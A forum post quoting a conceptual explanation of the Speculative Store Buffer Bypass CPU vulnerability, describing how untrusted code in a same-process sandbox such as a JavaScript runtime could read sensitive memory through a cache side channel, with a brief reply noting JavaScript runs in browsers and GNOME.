Originally posted by Royi
View Post
Unlike in previous attacks, Speculative Store Buffer Bypass (usually) allows only reading of memory locations from within the same privilege level. Thus, it would allow only a kernel to attack itself, or an application to read memory to which it already has legitimate access. It would, therefore, seem that such accesses are harmless and that it is implicitly safe to allow aggressive speculation. Unfortunately, this is not the case.
One potential problem arises when an application is implementing a sandbox or other attempt at isolation within a single running process. In this case, there are really two active contexts: the trusted sandbox environment, and the untrusted code running within it. Microprocessors are designed with the concept of different privilege levels, and of course, our entire computing world relies upon this in order to isolate processes and virtual machines from one another. But microprocessor designers don’t (traditionally) factor in separated contexts within the same process (same privilege or exception level). As a result, untrusted (possibly malicious) code can run within a sandbox and abuse store buffer speculation to read sensitive data from the sandbox itself.
In the common case of managed code environments (such as Java or JavaScript), an ability for a managed code to dump arbitrary content from its managing process could be fatal to the security of the application, or of other applications running within the same shared process. The attack is possible because the code may be constructed to appear to perform benign reads of values to which it has legitimate access. These accesses are seen by the runtime security checks that validate the managed code prior to allowing it to execute. Unfortunately, the untrusted managed code could, in fact, be abusing speculation to see unsafe previous values of memory variables, pointers, and sensitive security structures through a cache side channel.
Note that javascript is run in web browsers and GNOME, for example.
Comment